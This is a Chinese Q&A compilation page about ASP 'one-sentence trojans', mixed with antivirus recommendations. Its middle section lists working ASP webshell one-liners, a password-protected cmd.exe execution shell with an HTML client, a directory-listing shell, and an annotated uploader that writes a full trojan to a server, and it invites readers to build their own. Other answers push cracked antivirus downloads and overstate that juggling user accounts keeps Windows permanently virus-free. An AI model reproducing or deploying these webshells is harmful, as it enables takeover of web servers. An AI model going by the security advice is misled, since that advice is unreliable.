本文目录一览:
一句话木马有什么样的危害?危害有多大?
您好:
一句话木马病毒一般是损坏系统文件为主的,如果您的电脑中了一句话木马病毒的话,建议您使用腾讯电脑管家的闪电杀毒功能对您的电脑杀毒,腾讯电脑管家是采用“4+1”核“芯”杀毒引擎的专业杀毒软件,杀毒能力很强大,是完全可以帮助您查杀干净电脑中的病毒的,您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载
腾讯电脑管家企业平台:
网站文件里有上千个文件被感染一句话木马,怎么能彻底清除干净
可以用腾讯电脑管家,管家云库,云安全检测中心,拥有全球最大的恶意网站数据库。云智能预警系统,在木马活动早期侦测并阻断木马的破坏行为,通过云查杀技术秒杀最新流行木马。精确打击病毒,瞬时查杀风险。
怎样查杀木马病毒?
建议你安装专业的杀毒软件,推荐使用金山毒霸2011云安全杀毒软件,我正在使用这个,资源占用少,而且查杀效果也很好的。
一般情况下,电脑中毒或者中木马或者病毒之后,木马病毒都会破坏系统的,一般杀毒软件是不能解决这些问题的,推荐你使用金山网盾或者金山急救箱等系统修复工具对系统进行修复,我就是这样解决问题的。
一句话木马
ASP一句话木马大全!
%eval request("MH")%
%execute request("MH")%
%execute(request("MH"))%
%If Request("MH")"" Then Execute(Request("MH"))%
%if request ("MH")""then session("MH")=request("MH"):end if:if session("MH")"" then execute session("MH")%
SCRIPT language=VBScript runat="server"execute request("MH")/SCRIPT
%@ Page Language="Jscript"%
%eval(Request.Item["MH"],"unsafe");%
1 asp一句话木马
一句话木马 服务器端
带验证:
——————————————cmd.asp————————————————
%
if request("authkey")="pic16f873a" then
%
textarea readonly cols=80 rows=25
%response.write server.createobject("wscript.shell").exec("cmd.exe /c "request("cmd")).stdout.readall%
/textarea
%
end if
%
带验证 客户端
——————————————cmd.html————————————————
HTML
HEAD
meta http-equiv="Content-Type" content="text/html; charset=gbk"
/HEAD
div align=center
FORM method=post name=frm target=_blank
Host:input type=text name=act size=65 value="http://"
br
br
Cmd :input type=text name=cmd size=65 value="cmd"
br
br
input type=hidden name=authkey value="pic16f873a"
Input name=Send
onclick="Javascipt:frm.action=document.frm.act.value;
frm.submit();"
type=button value="Send Command"
/FORM
/div
目录浏览
服务器端
_________________________________________
%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items
for each iii in diritems
response.write iii.path "font color=blue[" iii.size "]/fontbr"
next
end if
%
_________________________________________
客户端
__________________________________________
HTML
HEAD
meta http-equiv="Content-Type" content="text/html; charset=gbk"
/HEAD
div align=center
FORM method=post name=frm target=_blank
Host:input type=text name=act size=65 value="http://"
br
br
Path:input type=text name=path size=65 value="C:\"
br
br
input type=hidden name=authkey value="pic16f873a"
Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command"
/FORM
/div
一句话木马客户端源文件:
里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了
***********************************************************
form action= method=post
//"action="后面是需要修改的以asp命名的数据库的提交地址
//这个标签的意思是建立一个表单 以post方式提交给连接处理
textarea name=value cols=120 rows=10 width=45
//这里的value值根据服务端%execute request("value")%中value而设定
//可以自行修改成%execute request("p")%相应这里的value值也必须改为p
set lP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应
lP.SaveToFile server.mappath("wei.asp"),2
//将木马内容以覆盖文件的方式写入wei.asp
//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登 陆界面
/textarea
//这段程序的功能:利用插入到数据库文件的%execute request("value")%这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了
textarea name=joeving cols=120 rows=10 width=45添入生成木马的内容/textareaBRcenterbr
//这段标签是你用来添加木马内容用的
input type=submit value=提交
/form
***********************************************************
//程序的主要框架是
form
textarea/textarea//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示
textarea/textarea//添加木马内容用的
/form
其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~呵呵
希望对你能有所帮助。
怎样查杀木马病毒
木马清除最好是手动清除,这样既杀得彻底也杀得放心。 中了病毒,要是杀毒软件有提示,可以看看那个病毒的名称,再上网搜病毒相关资料(像AV终结者那样会禁止搜索资料的病毒可以从其它渠道获得病毒的相关信息或是把病毒上传给杀毒厂商,寻求帮助),如果有对应的专杀工具,下载,安全模式杀毒即可,没有的话就从一些资料上分析该病毒的特征,然后从那些特征开始着手。那些木马进程一般都会隐藏,很难找到,最好使用IcesWord(冰刃)来查找,并在安全模式下删除,然后在注册表里把相关名称的键值删除(删除前请备份),再用冰刃看看硬盘里是否有病毒残余(名字大致相同的且是新建的文件),有的话全部删除。如果系统中有重要数据受到损坏,就不要再进行其它操作(要是进行其它操作会覆盖掉那些系统隐藏的正常的数据),上网搜索数据恢复软件即可。卡巴斯基是世界病毒库最大的一款杀毒软件.但是占内寸较大.如果电脑配置好的话可以考虑安装.如果配置一般的话建议安装NOD32,它占内存小,杀毒能力不错,保护范围全面.据说网上有很多免费的NOD32下载!推荐nod32这款杀毒软件,获2007年度AV-Comparatives测试总冠军,非常出色的杀软,杀毒能力很强,占资源很小,安装包大小不到20M,而且没有任何广告,虽然同样是国外杀软,但是对国内软件支持的很好,我使用目前还没出现过误报误杀的现象。现在下载pplive可以免费下载nod32的简体中文版并且赠送半年的正版激活码这是官方的活动,完全免费的。不妨试试最好配合安全卫士360和QQKAV一起使用,能更好的保护系统。(可以到丁香鱼工作室下载各种破解版免费的杀毒软件)丁香鱼工作室: 如果大家使用的是Windows 2K或Windows XP那么教大家一招克就能死所有病毒!!如果你是新装的系统(或者是你能确认你的系统当前是无毒的),那就再好不过了,现在就立即就打开:“开始→程序→管理工具→计算机管理→本地用户和组→用户” 吧!首先就是把超级管理员密码更改成十位数以上,然后再建立一个用户,把它的密码也设置成十位以上并且提升为超级管理员。这样做的目的是为了双保险:如果你忘记了其中一个密码,还有使用另一个超管密码登陆来挽回的余地,免得你被拒绝于系统之外;再者就是网上的黑客无法再通过猜测你系统超管密码的方式远程获得你系统的控制权而进行破坏。接着再添加两个用户,比如用户名分别为:user1、user2;并且指定他们属于user组,好了,准备工作到这里就全部完成了,以后你除了必要的维护计算机外就不要使用超级管理员和user2登陆了。只使用user1登陆就可以了。登陆之后上网的时候找到 ie,并为它建立一个快捷方式到桌面上,右键单击快捷方式,选择“以其他用户方式运行”点确定!要上网的时候就点这个快捷方式,它会跟你要用户名和密码这时候你就输入user2的用户名和密码!!!好了,现在你可以使用这个打开的窗口去上网了,可以随你便去放心的浏览任何恶毒的、恶意的、网站跟网页,而不必再担心中招了!因为你当前的系统活动的用户时user1。而user2是不活动的用户,我们使用这个不活动的用户去上网时,无论多聪明的网站,通过ie 得到的信息都将让它都将以为这个user2就是你当前活动的用户,如果它要在你浏览时用恶意代码对你的系统搞搞破坏的话根本就时行不通的,即使能行通,那么被修改掉的仅仅时use2的一个配置文件罢了,而很多恶意代码和病毒试图通过user2进行的破坏活动却都将失败,因为user2根本就没运行,怎么能取得系统的操作权呢??既然取不得,也就对你无可奈何了。而他们更不可能跨越用户来操作,因为微软得配置本来就是各各用户之间是独立的,就象别人不可能跑到我家占据我睡觉用的床一样,它们无法占据user1的位置!所以你只要能保证总是以这个user2用户做代理来上网(但却不要使用user2来登陆系统,因为如果那样的话,如果user2以前中过什么网页病毒,那么在user2登陆的同时,他们极有可能被激活!),那么无论你中多少网页病毒,全部都将是无法运行或被你当前的user1用户加载的,所以你当前的系统将永远无毒!不过总有疏忽的时候,一个不小心中毒了怎么办??不用担心,现在我们就可以来尽情的表演脱壳的技术了!开始金蝉脱壳:重新启动计算机,使用超级管理员登陆——进入系统后什么程序都不要运行你会惊奇的发现在的系统竟然表现的完全无毒!!,那就再好不过了,现在就立即就打开:“开始→程序→管理工具→计算机管理→本地用户和组→用户” 吧!把里面的user1和user2两个用户权删掉吧,你只需要这么轻轻的一删就可以了,那么以前随着这两个用户而存在的病毒也就跟随着这两个用户的消失而一起去长眠了——(好象是陪葬,呵呵!)。这么做过之后我保证你的win2k就象新装的一个样,任何系统文件和系统进程里都完全是没有病毒的!好!现在再重复开始的步骤从新建立user1和user2两个用户,让他们复活吧。他们复活是复活了,但是曾跟随了他们的病毒却是没这机会了,因为win2k 重新建立用户的时候会重新分配给他们全新的配置,而这个配置是全新的也是不可能包含病毒的!!!建立完成之后立即注销超级管理员,转如使用user1登陆,继续你象做的事吧,你会发现你的系统如同全新了!以上方法可以周而复始的用,再加上经常的去打微软的补丁,几乎可以永远保证你的操作系统是无毒状态!只要你能遵循以下几条规辙:一、任何时间都不以超级管理员的身份登陆系统——除非你要进行系统级更新和维护、需要使用超级管理员身份的时候或是你需要添加和删除用户的时候。二、必须使用超级管理员登陆的时候,保证不使用和运行任何除了操作系统自带的工具和程序之外的任何东西,而且所有维护都只通过开始菜单里的选项来完成,甚至连使用资源管理器去浏览硬盘都不!只做做用户和系统的管理和维护就立即退出,而决不多做逗留!(这也是微软的要求,微软最了解自己的东东,他的建议是正确的。浏览硬盘的事,在其他用户身份下你有大把的机会,在超级管理员的身份下还是不要了!!这应该事能完全作到的)。